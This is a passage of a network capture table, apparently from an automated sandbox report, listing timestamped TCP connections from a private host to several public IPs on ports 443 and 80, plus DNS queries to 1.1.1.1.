Apr 15, 2025 18:49:48.943582058 CEST	49733	443	192.168.2.4	104.21.71.52
Apr 15, 2025 18:49:48.944371939 CEST	443	49733	104.21.71.52	192.168.2.4
Apr 15, 2025 18:49:48.944436073 CEST	49733	443	192.168.2.4	104.21.71.52
Apr 15, 2025 18:49:48.944462061 CEST	443	49733	104.21.71.52	192.168.2.4
Apr 15, 2025 18:49:48.944524050 CEST	49733	443	192.168.2.4	104.21.71.52
Apr 15, 2025 18:49:48.945211887 CEST	443	49733	104.21.71.52	192.168.2.4
Apr 15, 2025 18:49:48.945269108 CEST	49733	443	192.168.2.4	104.21.71.52
Apr 15, 2025 18:49:48.945300102 CEST	443	49733	104.21.71.52	192.168.2.4
Apr 15, 2025 18:49:48.945362091 CEST	49733	443	192.168.2.4	104.21.71.52
Apr 15, 2025 18:49:48.946027040 CEST	443	49733	104.21.71.52	192.168.2.4
Apr 15, 2025 18:49:48.946085930 CEST	49733	443	192.168.2.4	104.21.71.52
Apr 15, 2025 18:49:48.946911097 CEST	443	49733	104.21.71.52	192.168.2.4
Apr 15, 2025 18:49:48.946988106 CEST	49733	443	192.168.2.4	104.21.71.52
Apr 15, 2025 18:49:48.947418928 CEST	443	49733	104.21.71.52	192.168.2.4
Apr 15, 2025 18:49:48.947482109 CEST	49733	443	192.168.2.4	104.21.71.52
Apr 15, 2025 18:49:48.947508097 CEST	443	49733	104.21.71.52	192.168.2.4
Apr 15, 2025 18:49:48.947566032 CEST	49733	443	192.168.2.4	104.21.71.52
Apr 15, 2025 18:49:48.948322058 CEST	443	49733	104.21.71.52	192.168.2.4
Apr 15, 2025 18:49:48.948386908 CEST	49733	443	192.168.2.4	104.21.71.52
Apr 15, 2025 18:49:48.948410034 CEST	443	49733	104.21.71.52	192.168.2.4
Apr 15, 2025 18:49:48.948466063 CEST	49733	443	192.168.2.4	104.21.71.52
Apr 15, 2025 18:49:48.949151993 CEST	443	49733	104.21.71.52	192.168.2.4
Apr 15, 2025 18:49:48.949213982 CEST	49733	443	192.168.2.4	104.21.71.52
Apr 15, 2025 18:49:48.950033903 CEST	443	49733	104.21.71.52	192.168.2.4
Apr 15, 2025 18:49:48.950100899 CEST	49733	443	192.168.2.4	104.21.71.52
Apr 15, 2025 18:49:48.950124025 CEST	443	49733	104.21.71.52	192.168.2.4
Apr 15, 2025 18:49:48.950184107 CEST	49733	443	192.168.2.4	104.21.71.52
Apr 15, 2025 18:49:48.951641083 CEST	443	49733	104.21.71.52	192.168.2.4
Apr 15, 2025 18:49:48.951647997 CEST	443	49733	104.21.71.52	192.168.2.4
Apr 15, 2025 18:49:48.951729059 CEST	49733	443	192.168.2.4	104.21.71.52
Apr 15, 2025 18:49:48.952542067 CEST	443	49733	104.21.71.52	192.168.2.4
Apr 15, 2025 18:49:48.952616930 CEST	49733	443	192.168.2.4	104.21.71.52
Apr 15, 2025 18:49:48.952631950 CEST	443	49733	104.21.71.52	192.168.2.4
Apr 15, 2025 18:49:48.952685118 CEST	49733	443	192.168.2.4	104.21.71.52
Apr 15, 2025 18:49:48.954760075 CEST	443	49733	104.21.71.52	192.168.2.4
Apr 15, 2025 18:49:48.954804897 CEST	443	49733	104.21.71.52	192.168.2.4
Apr 15, 2025 18:49:48.954840899 CEST	49733	443	192.168.2.4	104.21.71.52
Apr 15, 2025 18:49:48.954854012 CEST	443	49733	104.21.71.52	192.168.2.4
Apr 15, 2025 18:49:48.954880953 CEST	49733	443	192.168.2.4	104.21.71.52
Apr 15, 2025 18:49:48.954899073 CEST	49733	443	192.168.2.4	104.21.71.52
Apr 15, 2025 18:49:48.955591917 CEST	443	49733	104.21.71.52	192.168.2.4
Apr 15, 2025 18:49:48.955660105 CEST	49733	443	192.168.2.4	104.21.71.52
Apr 15, 2025 18:49:48.957422018 CEST	443	49733	104.21.71.52	192.168.2.4
Apr 15, 2025 18:49:48.957463980 CEST	443	49733	104.21.71.52	192.168.2.4
Apr 15, 2025 18:49:48.957508087 CEST	49733	443	192.168.2.4	104.21.71.52
Apr 15, 2025 18:49:48.957520962 CEST	443	49733	104.21.71.52	192.168.2.4
Apr 15, 2025 18:49:48.957554102 CEST	49733	443	192.168.2.4	104.21.71.52
Apr 15, 2025 18:49:48.957573891 CEST	49733	443	192.168.2.4	104.21.71.52
Apr 15, 2025 18:49:48.958318949 CEST	443	49733	104.21.71.52	192.168.2.4
Apr 15, 2025 18:49:48.958383083 CEST	49733	443	192.168.2.4	104.21.71.52
Apr 15, 2025 18:49:48.958424091 CEST	443	49733	104.21.71.52	192.168.2.4
Apr 15, 2025 18:49:48.958479881 CEST	49733	443	192.168.2.4	104.21.71.52
Apr 15, 2025 18:49:48.958492994 CEST	443	49733	104.21.71.52	192.168.2.4
Apr 15, 2025 18:49:48.958632946 CEST	443	49733	104.21.71.52	192.168.2.4
Apr 15, 2025 18:49:48.958681107 CEST	49733	443	192.168.2.4	104.21.71.52
Apr 15, 2025 18:49:48.986196041 CEST	49733	443	192.168.2.4	104.21.71.52
Apr 15, 2025 18:49:48.986232042 CEST	443	49733	104.21.71.52	192.168.2.4
Apr 15, 2025 18:49:49.144160986 CEST	49734	443	192.168.2.4	3.165.184.23
Apr 15, 2025 18:49:49.144195080 CEST	443	49734	3.165.184.23	192.168.2.4
Apr 15, 2025 18:49:49.144272089 CEST	49734	443	192.168.2.4	3.165.184.23
Apr 15, 2025 18:49:49.144320965 CEST	49735	443	192.168.2.4	3.165.184.23
Apr 15, 2025 18:49:49.144412041 CEST	443	49735	3.165.184.23	192.168.2.4
Apr 15, 2025 18:49:49.144450903 CEST	49734	443	192.168.2.4	3.165.184.23
Apr 15, 2025 18:49:49.144462109 CEST	443	49734	3.165.184.23	192.168.2.4
Apr 15, 2025 18:49:49.144484043 CEST	49735	443	192.168.2.4	3.165.184.23
Apr 15, 2025 18:49:49.144706011 CEST	49735	443	192.168.2.4	3.165.184.23
Apr 15, 2025 18:49:49.144741058 CEST	443	49735	3.165.184.23	192.168.2.4
Apr 15, 2025 18:49:49.374393940 CEST	443	49735	3.165.184.23	192.168.2.4
Apr 15, 2025 18:49:49.374480009 CEST	49735	443	192.168.2.4	3.165.184.23
Apr 15, 2025 18:49:49.374788046 CEST	443	49734	3.165.184.23	192.168.2.4
Apr 15, 2025 18:49:49.374852896 CEST	49734	443	192.168.2.4	3.165.184.23
Apr 15, 2025 18:49:49.375714064 CEST	49735	443	192.168.2.4	3.165.184.23
Apr 15, 2025 18:49:49.375722885 CEST	443	49735	3.165.184.23	192.168.2.4
Apr 15, 2025 18:49:49.375988007 CEST	443	49735	3.165.184.23	192.168.2.4
Apr 15, 2025 18:49:49.376013994 CEST	49734	443	192.168.2.4	3.165.184.23
Apr 15, 2025 18:49:49.376019955 CEST	443	49734	3.165.184.23	192.168.2.4
Apr 15, 2025 18:49:49.376226902 CEST	443	49734	3.165.184.23	192.168.2.4
Apr 15, 2025 18:49:49.376226902 CEST	49735	443	192.168.2.4	3.165.184.23
Apr 15, 2025 18:49:49.376373053 CEST	49734	443	192.168.2.4	3.165.184.23
Apr 15, 2025 18:49:49.416305065 CEST	443	49735	3.165.184.23	192.168.2.4
Apr 15, 2025 18:49:49.424315929 CEST	443	49734	3.165.184.23	192.168.2.4
Apr 15, 2025 18:49:49.851383924 CEST	443	49735	3.165.184.23	192.168.2.4
Apr 15, 2025 18:49:49.851443052 CEST	443	49735	3.165.184.23	192.168.2.4
Apr 15, 2025 18:49:49.851485014 CEST	443	49735	3.165.184.23	192.168.2.4
Apr 15, 2025 18:49:49.851547956 CEST	49735	443	192.168.2.4	3.165.184.23
Apr 15, 2025 18:49:49.851598978 CEST	443	49735	3.165.184.23	192.168.2.4
Apr 15, 2025 18:49:49.851648092 CEST	49735	443	192.168.2.4	3.165.184.23
Apr 15, 2025 18:49:49.851689100 CEST	443	49735	3.165.184.23	192.168.2.4
Apr 15, 2025 18:49:49.851730108 CEST	49735	443	192.168.2.4	3.165.184.23
Apr 15, 2025 18:49:49.851744890 CEST	443	49735	3.165.184.23	192.168.2.4
Apr 15, 2025 18:49:49.851908922 CEST	49735	443	192.168.2.4	3.165.184.23
Apr 15, 2025 18:49:49.868176937 CEST	443	49734	3.165.184.23	192.168.2.4
Apr 15, 2025 18:49:49.868366957 CEST	443	49734	3.165.184.23	192.168.2.4
Apr 15, 2025 18:49:49.868478060 CEST	49734	443	192.168.2.4	3.165.184.23
Apr 15, 2025 18:49:49.868488073 CEST	443	49734	3.165.184.23	192.168.2.4
Apr 15, 2025 18:49:49.868506908 CEST	443	49734	3.165.184.23	192.168.2.4
Apr 15, 2025 18:49:49.868666887 CEST	49734	443	192.168.2.4	3.165.184.23
Apr 15, 2025 18:49:49.869015932 CEST	49734	443	192.168.2.4	3.165.184.23
Apr 15, 2025 18:49:49.869025946 CEST	443	49734	3.165.184.23	192.168.2.4
Apr 15, 2025 18:49:49.909290075 CEST	443	49735	3.165.184.23	192.168.2.4
Apr 15, 2025 18:49:49.909375906 CEST	443	49735	3.165.184.23	192.168.2.4
Apr 15, 2025 18:49:49.909388065 CEST	49735	443	192.168.2.4	3.165.184.23
Apr 15, 2025 18:49:49.909425020 CEST	443	49735	3.165.184.23	192.168.2.4
Apr 15, 2025 18:49:49.909460068 CEST	443	49735	3.165.184.23	192.168.2.4
Apr 15, 2025 18:49:49.909625053 CEST	49735	443	192.168.2.4	3.165.184.23
Apr 15, 2025 18:49:49.910185099 CEST	49735	443	192.168.2.4	3.165.184.23
Apr 15, 2025 18:49:49.910228968 CEST	443	49735	3.165.184.23	192.168.2.4
Apr 15, 2025 18:49:50.036919117 CEST	49736	443	192.168.2.4	3.165.184.23
Apr 15, 2025 18:49:50.036988974 CEST	443	49736	3.165.184.23	192.168.2.4
Apr 15, 2025 18:49:50.037072897 CEST	49736	443	192.168.2.4	3.165.184.23
Apr 15, 2025 18:49:50.037715912 CEST	49736	443	192.168.2.4	3.165.184.23
Apr 15, 2025 18:49:50.037734985 CEST	443	49736	3.165.184.23	192.168.2.4
Apr 15, 2025 18:49:50.147908926 CEST	49737	443	192.168.2.4	108.177.122.105
Apr 15, 2025 18:49:50.148006916 CEST	443	49737	108.177.122.105	192.168.2.4
Apr 15, 2025 18:49:50.148205042 CEST	49737	443	192.168.2.4	108.177.122.105
Apr 15, 2025 18:49:50.148288965 CEST	49737	443	192.168.2.4	108.177.122.105
Apr 15, 2025 18:49:50.148313999 CEST	443	49737	108.177.122.105	192.168.2.4
Apr 15, 2025 18:49:50.257396936 CEST	443	49736	3.165.184.23	192.168.2.4
Apr 15, 2025 18:49:50.257544041 CEST	49736	443	192.168.2.4	3.165.184.23
Apr 15, 2025 18:49:50.258160114 CEST	49736	443	192.168.2.4	3.165.184.23
Apr 15, 2025 18:49:50.258168936 CEST	443	49736	3.165.184.23	192.168.2.4
Apr 15, 2025 18:49:50.258404016 CEST	443	49736	3.165.184.23	192.168.2.4
Apr 15, 2025 18:49:50.261851072 CEST	49736	443	192.168.2.4	3.165.184.23
Apr 15, 2025 18:49:50.308283091 CEST	443	49736	3.165.184.23	192.168.2.4
Apr 15, 2025 18:49:50.371575117 CEST	443	49737	108.177.122.105	192.168.2.4
Apr 15, 2025 18:49:50.371716976 CEST	49737	443	192.168.2.4	108.177.122.105
Apr 15, 2025 18:49:50.373344898 CEST	49737	443	192.168.2.4	108.177.122.105
Apr 15, 2025 18:49:50.373369932 CEST	443	49737	108.177.122.105	192.168.2.4
Apr 15, 2025 18:49:50.373908043 CEST	443	49737	108.177.122.105	192.168.2.4
Apr 15, 2025 18:49:50.377635002 CEST	49737	443	192.168.2.4	108.177.122.105
Apr 15, 2025 18:49:50.424282074 CEST	443	49737	108.177.122.105	192.168.2.4
Apr 15, 2025 18:49:50.483922005 CEST	443	49736	3.165.184.23	192.168.2.4
Apr 15, 2025 18:49:50.484045982 CEST	443	49736	3.165.184.23	192.168.2.4
Apr 15, 2025 18:49:50.484103918 CEST	49736	443	192.168.2.4	3.165.184.23
Apr 15, 2025 18:49:50.484123945 CEST	443	49736	3.165.184.23	192.168.2.4
Apr 15, 2025 18:49:50.484180927 CEST	443	49736	3.165.184.23	192.168.2.4
Apr 15, 2025 18:49:50.484230042 CEST	49736	443	192.168.2.4	3.165.184.23
Apr 15, 2025 18:49:50.485096931 CEST	49736	443	192.168.2.4	3.165.184.23
Apr 15, 2025 18:49:50.485115051 CEST	443	49736	3.165.184.23	192.168.2.4
Apr 15, 2025 18:49:50.586970091 CEST	443	49737	108.177.122.105	192.168.2.4
Apr 15, 2025 18:49:50.587277889 CEST	443	49737	108.177.122.105	192.168.2.4
Apr 15, 2025 18:49:50.587347031 CEST	49737	443	192.168.2.4	108.177.122.105
Apr 15, 2025 18:49:50.604181051 CEST	49737	443	192.168.2.4	108.177.122.105
Apr 15, 2025 18:49:50.604218960 CEST	443	49737	108.177.122.105	192.168.2.4
Apr 15, 2025 18:49:50.887805939 CEST	49738	443	192.168.2.4	108.177.122.103
Apr 15, 2025 18:49:50.887893915 CEST	443	49738	108.177.122.103	192.168.2.4
Apr 15, 2025 18:49:50.887976885 CEST	49738	443	192.168.2.4	108.177.122.103
Apr 15, 2025 18:49:50.888154984 CEST	49738	443	192.168.2.4	108.177.122.103
Apr 15, 2025 18:49:50.888187885 CEST	443	49738	108.177.122.103	192.168.2.4
Apr 15, 2025 18:49:50.939717054 CEST	49681	80	192.168.2.4	2.17.190.73
Apr 15, 2025 18:49:51.108772039 CEST	443	49738	108.177.122.103	192.168.2.4
Apr 15, 2025 18:49:51.108967066 CEST	49738	443	192.168.2.4	108.177.122.103
Apr 15, 2025 18:49:51.109833002 CEST	49738	443	192.168.2.4	108.177.122.103
Apr 15, 2025 18:49:51.109860897 CEST	443	49738	108.177.122.103	192.168.2.4
Apr 15, 2025 18:49:51.110076904 CEST	443	49738	108.177.122.103	192.168.2.4
Apr 15, 2025 18:49:51.110951900 CEST	49738	443	192.168.2.4	108.177.122.103
Apr 15, 2025 18:49:51.152281046 CEST	443	49738	108.177.122.103	192.168.2.4
Apr 15, 2025 18:49:51.238434076 CEST	49681	80	192.168.2.4	2.17.190.73
Apr 15, 2025 18:49:51.288423061 CEST	49709	443	192.168.2.4	131.253.33.254
Apr 15, 2025 18:49:51.289001942 CEST	49709	443	192.168.2.4	131.253.33.254
Apr 15, 2025 18:49:51.289036989 CEST	49709	443	192.168.2.4	131.253.33.254
Apr 15, 2025 18:49:51.326723099 CEST	443	49738	108.177.122.103	192.168.2.4
Apr 15, 2025 18:49:51.326817036 CEST	443	49738	108.177.122.103	192.168.2.4
Apr 15, 2025 18:49:51.326914072 CEST	49738	443	192.168.2.4	108.177.122.103
Apr 15, 2025 18:49:51.328017950 CEST	49738	443	192.168.2.4	108.177.122.103
Apr 15, 2025 18:49:51.328047991 CEST	443	49738	108.177.122.103	192.168.2.4
Apr 15, 2025 18:49:51.409425974 CEST	443	49709	131.253.33.254	192.168.2.4
Apr 15, 2025 18:49:51.409764051 CEST	443	49709	131.253.33.254	192.168.2.4
Apr 15, 2025 18:49:51.410449982 CEST	443	49709	131.253.33.254	192.168.2.4
Apr 15, 2025 18:49:51.410464048 CEST	443	49709	131.253.33.254	192.168.2.4
Apr 15, 2025 18:49:51.410515070 CEST	49709	443	192.168.2.4	131.253.33.254
Apr 15, 2025 18:49:51.410552979 CEST	49709	443	192.168.2.4	131.253.33.254
Apr 15, 2025 18:49:51.412798882 CEST	443	49709	131.253.33.254	192.168.2.4
Apr 15, 2025 18:49:51.412815094 CEST	443	49709	131.253.33.254	192.168.2.4
Apr 15, 2025 18:49:51.412877083 CEST	49709	443	192.168.2.4	131.253.33.254
Apr 15, 2025 18:49:51.423027039 CEST	49709	443	192.168.2.4	131.253.33.254
Apr 15, 2025 18:49:51.437522888 CEST	49709	443	192.168.2.4	131.253.33.254
Apr 15, 2025 18:49:51.543741941 CEST	443	49709	131.253.33.254	192.168.2.4
Apr 15, 2025 18:49:51.558393002 CEST	443	49709	131.253.33.254	192.168.2.4
Apr 15, 2025 18:49:51.560642958 CEST	443	49709	131.253.33.254	192.168.2.4
Apr 15, 2025 18:49:51.560656071 CEST	443	49709	131.253.33.254	192.168.2.4
Apr 15, 2025 18:49:51.560714006 CEST	49709	443	192.168.2.4	131.253.33.254
Apr 15, 2025 18:49:51.564050913 CEST	49680	443	192.168.2.4	204.79.197.222
Apr 15, 2025 18:49:51.564393044 CEST	49741	443	192.168.2.4	204.79.197.222
Apr 15, 2025 18:49:51.564479113 CEST	443	49741	204.79.197.222	192.168.2.4
Apr 15, 2025 18:49:51.564560890 CEST	49741	443	192.168.2.4	204.79.197.222
Apr 15, 2025 18:49:51.564960957 CEST	49741	443	192.168.2.4	204.79.197.222
Apr 15, 2025 18:49:51.564994097 CEST	443	49741	204.79.197.222	192.168.2.4
Apr 15, 2025 18:49:51.757038116 CEST	49742	80	192.168.2.4	74.125.136.94
Apr 15, 2025 18:49:51.847734928 CEST	49681	80	192.168.2.4	2.17.190.73
Apr 15, 2025 18:49:51.863380909 CEST	80	49742	74.125.136.94	192.168.2.4
Apr 15, 2025 18:49:51.863462925 CEST	49742	80	192.168.2.4	74.125.136.94
Apr 15, 2025 18:49:51.863655090 CEST	49742	80	192.168.2.4	74.125.136.94
Apr 15, 2025 18:49:51.878993988 CEST	49680	443	192.168.2.4	204.79.197.222
Apr 15, 2025 18:49:51.920969963 CEST	443	49741	204.79.197.222	192.168.2.4
Apr 15, 2025 18:49:51.921046972 CEST	49741	443	192.168.2.4	204.79.197.222
Apr 15, 2025 18:49:51.970993042 CEST	80	49742	74.125.136.94	192.168.2.4
Apr 15, 2025 18:49:51.971504927 CEST	80	49742	74.125.136.94	192.168.2.4
Apr 15, 2025 18:49:52.019620895 CEST	49742	80	192.168.2.4	74.125.136.94
Apr 15, 2025 18:49:52.488548994 CEST	49680	443	192.168.2.4	204.79.197.222
Apr 15, 2025 18:49:52.957299948 CEST	49678	443	192.168.2.4	20.189.173.27
Apr 15, 2025 18:49:53.051080942 CEST	49681	80	192.168.2.4	2.17.190.73
Apr 15, 2025 18:49:53.691675901 CEST	49680	443	192.168.2.4	204.79.197.222
Apr 15, 2025 18:49:53.847935915 CEST	49671	443	192.168.2.4	204.79.197.203
Apr 15, 2025 18:49:54.515650988 CEST	49745	443	192.168.2.4	104.21.25.37
Apr 15, 2025 18:49:54.515693903 CEST	443	49745	104.21.25.37	192.168.2.4
Apr 15, 2025 18:49:54.515744925 CEST	49745	443	192.168.2.4	104.21.25.37
Apr 15, 2025 18:49:54.515978098 CEST	49745	443	192.168.2.4	104.21.25.37
Apr 15, 2025 18:49:54.515994072 CEST	443	49745	104.21.25.37	192.168.2.4
Apr 15, 2025 18:49:54.774847984 CEST	443	49745	104.21.25.37	192.168.2.4
Apr 15, 2025 18:49:54.774913073 CEST	49745	443	192.168.2.4	104.21.25.37
Apr 15, 2025 18:49:54.776124001 CEST	49745	443	192.168.2.4	104.21.25.37
Apr 15, 2025 18:49:54.776132107 CEST	443	49745	104.21.25.37	192.168.2.4
Apr 15, 2025 18:49:54.776525974 CEST	443	49745	104.21.25.37	192.168.2.4
Apr 15, 2025 18:49:54.776835918 CEST	49745	443	192.168.2.4	104.21.25.37
Apr 15, 2025 18:49:54.824291945 CEST	443	49745	104.21.25.37	192.168.2.4
Apr 15, 2025 18:49:54.877944946 CEST	443	49723	173.194.219.105	192.168.2.4
Apr 15, 2025 18:49:54.878087997 CEST	443	49723	173.194.219.105	192.168.2.4
Apr 15, 2025 18:49:54.878216982 CEST	49723	443	192.168.2.4	173.194.219.105
Apr 15, 2025 18:49:55.457885981 CEST	49681	80	192.168.2.4	2.17.190.73
Apr 15, 2025 18:49:55.503009081 CEST	443	49745	104.21.25.37	192.168.2.4
Apr 15, 2025 18:49:55.503283024 CEST	443	49745	104.21.25.37	192.168.2.4
Apr 15, 2025 18:49:55.503607988 CEST	49745	443	192.168.2.4	104.21.25.37
Apr 15, 2025 18:49:55.504542112 CEST	49745	443	192.168.2.4	104.21.25.37
Apr 15, 2025 18:49:55.504554033 CEST	443	49745	104.21.25.37	192.168.2.4
Apr 15, 2025 18:49:55.507893085 CEST	49723	443	192.168.2.4	173.194.219.105
Apr 15, 2025 18:49:55.507957935 CEST	443	49723	173.194.219.105	192.168.2.4
Apr 15, 2025 18:49:55.692671061 CEST	49747	443	192.168.2.4	104.21.25.37
Apr 15, 2025 18:49:55.692801952 CEST	443	49747	104.21.25.37	192.168.2.4
Apr 15, 2025 18:49:55.693051100 CEST	49747	443	192.168.2.4	104.21.25.37
Apr 15, 2025 18:49:55.693345070 CEST	49747	443	192.168.2.4	104.21.25.37
Apr 15, 2025 18:49:55.693368912 CEST	443	49747	104.21.25.37	192.168.2.4
Apr 15, 2025 18:49:55.944314957 CEST	443	49747	104.21.25.37	192.168.2.4
Apr 15, 2025 18:49:55.944391966 CEST	49747	443	192.168.2.4	104.21.25.37
Apr 15, 2025 18:49:55.944983959 CEST	49747	443	192.168.2.4	104.21.25.37
Apr 15, 2025 18:49:55.944999933 CEST	443	49747	104.21.25.37	192.168.2.4
Apr 15, 2025 18:49:55.945236921 CEST	443	49747	104.21.25.37	192.168.2.4
Apr 15, 2025 18:49:55.966599941 CEST	49747	443	192.168.2.4	104.21.25.37
Apr 15, 2025 18:49:56.012283087 CEST	443	49747	104.21.25.37	192.168.2.4
Apr 15, 2025 18:49:56.098503113 CEST	49680	443	192.168.2.4	204.79.197.222
Apr 15, 2025 18:49:56.669167995 CEST	443	49747	104.21.25.37	192.168.2.4
Apr 15, 2025 18:49:56.669285059 CEST	443	49747	104.21.25.37	192.168.2.4
Apr 15, 2025 18:49:56.669368982 CEST	49747	443	192.168.2.4	104.21.25.37
Apr 15, 2025 18:49:56.670666933 CEST	49747	443	192.168.2.4	104.21.25.37
Apr 15, 2025 18:49:56.670710087 CEST	443	49747	104.21.25.37	192.168.2.4
Apr 15, 2025 18:50:00.264103889 CEST	49681	80	192.168.2.4	2.17.190.73
Apr 15, 2025 18:50:00.910156965 CEST	49680	443	192.168.2.4	204.79.197.222
Apr 15, 2025 18:50:02.561364889 CEST	49678	443	192.168.2.4	20.189.173.27
Apr 15, 2025 18:50:06.223458052 CEST	49748	443	192.168.2.4	104.21.25.37
Apr 15, 2025 18:50:06.223515034 CEST	443	49748	104.21.25.37	192.168.2.4
Apr 15, 2025 18:50:06.224088907 CEST	49748	443	192.168.2.4	104.21.25.37
Apr 15, 2025 18:50:06.224275112 CEST	49748	443	192.168.2.4	104.21.25.37
Apr 15, 2025 18:50:06.224292040 CEST	443	49748	104.21.25.37	192.168.2.4
Apr 15, 2025 18:50:06.491451025 CEST	443	49748	104.21.25.37	192.168.2.4
Apr 15, 2025 18:50:06.491821051 CEST	49748	443	192.168.2.4	104.21.25.37
Apr 15, 2025 18:50:06.491868973 CEST	443	49748	104.21.25.37	192.168.2.4
Apr 15, 2025 18:50:06.491983891 CEST	49748	443	192.168.2.4	104.21.25.37
Apr 15, 2025 18:50:06.491993904 CEST	443	49748	104.21.25.37	192.168.2.4
Apr 15, 2025 18:50:07.298185110 CEST	443	49748	104.21.25.37	192.168.2.4
Apr 15, 2025 18:50:07.298471928 CEST	443	49748	104.21.25.37	192.168.2.4
Apr 15, 2025 18:50:07.298563004 CEST	49748	443	192.168.2.4	104.21.25.37
Apr 15, 2025 18:50:07.299563885 CEST	49748	443	192.168.2.4	104.21.25.37
Apr 15, 2025 18:50:07.299609900 CEST	443	49748	104.21.25.37	192.168.2.4
Apr 15, 2025 18:50:07.303442955 CEST	49750	443	192.168.2.4	104.21.25.37
Apr 15, 2025 18:50:07.303499937 CEST	443	49750	104.21.25.37	192.168.2.4
Apr 15, 2025 18:50:07.303649902 CEST	49750	443	192.168.2.4	104.21.25.37
Apr 15, 2025 18:50:07.303756952 CEST	49750	443	192.168.2.4	104.21.25.37
Apr 15, 2025 18:50:07.303771019 CEST	443	49750	104.21.25.37	192.168.2.4
Apr 15, 2025 18:50:07.559725046 CEST	443	49750	104.21.25.37	192.168.2.4
Apr 15, 2025 18:50:07.559973001 CEST	49750	443	192.168.2.4	104.21.25.37
Apr 15, 2025 18:50:07.559993029 CEST	443	49750	104.21.25.37	192.168.2.4
Apr 15, 2025 18:50:07.560112953 CEST	49750	443	192.168.2.4	104.21.25.37
Apr 15, 2025 18:50:07.560117006 CEST	443	49750	104.21.25.37	192.168.2.4
Apr 15, 2025 18:50:08.298468113 CEST	443	49750	104.21.25.37	192.168.2.4
Apr 15, 2025 18:50:08.298741102 CEST	443	49750	104.21.25.37	192.168.2.4
Apr 15, 2025 18:50:08.298897982 CEST	49750	443	192.168.2.4	104.21.25.37
Apr 15, 2025 18:50:08.300980091 CEST	49750	443	192.168.2.4	104.21.25.37
Apr 15, 2025 18:50:08.301006079 CEST	443	49750	104.21.25.37	192.168.2.4
Apr 15, 2025 18:50:09.873070002 CEST	49681	80	192.168.2.4	2.17.190.73
Apr 15, 2025 18:50:10.521181107 CEST	49680	443	192.168.2.4	204.79.197.222
Apr 15, 2025 18:50:44.615540028 CEST	49755	443	192.168.2.4	173.194.219.105
Apr 15, 2025 18:50:44.615608931 CEST	443	49755	173.194.219.105	192.168.2.4
Apr 15, 2025 18:50:44.615677118 CEST	49755	443	192.168.2.4	173.194.219.105
Apr 15, 2025 18:50:44.615875006 CEST	49755	443	192.168.2.4	173.194.219.105
Apr 15, 2025 18:50:44.615894079 CEST	443	49755	173.194.219.105	192.168.2.4
Apr 15, 2025 18:50:44.833283901 CEST	443	49755	173.194.219.105	192.168.2.4
Apr 15, 2025 18:50:44.833693027 CEST	49755	443	192.168.2.4	173.194.219.105
Apr 15, 2025 18:50:44.833729982 CEST	443	49755	173.194.219.105	192.168.2.4
Apr 15, 2025 18:50:52.301901102 CEST	49742	80	192.168.2.4	74.125.136.94
Apr 15, 2025 18:50:52.408454895 CEST	80	49742	74.125.136.94	192.168.2.4
Apr 15, 2025 18:50:52.408531904 CEST	49742	80	192.168.2.4	74.125.136.94
Apr 15, 2025 18:50:54.834853888 CEST	443	49755	173.194.219.105	192.168.2.4
Apr 15, 2025 18:50:54.835025072 CEST	443	49755	173.194.219.105	192.168.2.4
Apr 15, 2025 18:50:54.835086107 CEST	49755	443	192.168.2.4	173.194.219.105
Apr 15, 2025 18:50:54.837769985 CEST	49755	443	192.168.2.4	173.194.219.105
Apr 15, 2025 18:50:54.837802887 CEST	443	49755	173.194.219.105	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 15, 2025 18:49:40.928044081 CEST	53	56624	1.1.1.1	192.168.2.4
Apr 15, 2025 18:49:40.937267065 CEST	53	64077	1.1.1.1	192.168.2.4
Apr 15, 2025 18:49:41.761398077 CEST	53	59842	1.1.1.1	192.168.2.4
Apr 15, 2025 18:49:41.929107904 CEST	53	51527	1.1.1.1	192.168.2.4
Apr 15, 2025 18:49:44.552330971 CEST	57314	53	192.168.2.4	1.1.1.1
Apr 15, 2025 18:49:44.552503109 CEST	49459	53	192.168.2.4	1.1.1.1
Apr 15, 2025 18:49:44.659245968 CEST	53	57314	1.1.1.1	192.168.2.4
Apr 15, 2025 18:49:44.659831047 CEST	53	49459	1.1.1.1	192.168.2.4
Apr 15, 2025 18:49:46.704268932 CEST	53	57359	1.1.1.1	192.168.2.4
Apr 15, 2025 18:49:47.448373079 CEST	52903	53	192.168.2.4	1.1.1.1
Apr 15, 2025 18:49:47.448373079 CEST	65283	53	192.168.2.4	1.1.1.1
Apr 15, 2025 18:49:47.783731937 CEST	53	52903	1.1.1.1	192.168.2.4
Apr 15, 2025 18:49:47.788379908 CEST	53	65283	1.1.1.1	192.168.2.4
Apr 15, 2025 18:49:49.009190083 CEST	51713	53	192.168.2.4	1.1.1.1
Apr 15, 2025 18:49:49.009449959 CEST	59628	53	192.168.2.4	1.1.1.1
Apr 15, 2025 18:49:49.118272066 CEST	53	59628	1.1.1.1	192.168.2.4
Apr 15, 2025 18:49:49.143605947 CEST	53	51713	1.1.1.1	192.168.2.4
Apr 15, 2025 18:49:49.874142885 CEST	58796	53	192.168.2.4	1.1.1.1
Apr 15, 2025 18:49:49.874494076 CEST	60509	53	192.168.2.4	1.1.1.1
Apr 15, 2025 18:49:50.007838964 CEST	53	58796	1.1.1.1	192.168.2.4
Apr 15, 2025 18:49:50.039678097 CEST	61115	53	192.168.2.4	1.1.1.1
Apr 15, 2025 18:49:50.039913893 CEST	62666	53	192.168.2.4	1.1.1.1
Apr 15, 2025 18:49:50.047524929 CEST	53	60509	1.1.1.1	192.168.2.4
Apr 15, 2025 18:49:50.145992994 CEST	53	61115	1.1.1.1	192.168.2.4
Apr 15, 2025 18:49:50.146796942 CEST	53	62666	1.1.1.1	192.168.2.4
Apr 15, 2025 18:49:50.780497074 CEST	50481	53	192.168.2.4	1.1.1.1
Apr 15, 2025 18:49:50.780678034 CEST	58978	53	192.168.2.4	1.1.1.1
Apr 15, 2025 18:49:50.887049913 CEST	53	50481	1.1.1.1	192.168.2.4
Apr 15, 2025 18:49:50.887132883 CEST	53	58978	1.1.1.1	192.168.2.4
Apr 15, 2025 18:49:54.133766890 CEST	54509	53	192.168.2.4	1.1.1.1
Apr 15, 2025 18:49:54.133996010 CEST	49920	53	192.168.2.4	1.1.1.1
Apr 15, 2025 18:49:54.147762060 CEST	29556	24948	192.168.2.4	192.168.2.1
Apr 15, 2025 18:49:54.470405102 CEST	53	49920	1.1.1.1	192.168.2.4
Apr 15, 2025 18:49:54.514976025 CEST	53	54509	1.1.1.1	192.168.2.4
Apr 15, 2025 18:49:55.509819031 CEST	51653	53	192.168.2.4	1.1.1.1
Apr 15, 2025 18:49:55.509963989 CEST	64238	53	192.168.2.4	1.1.1.1
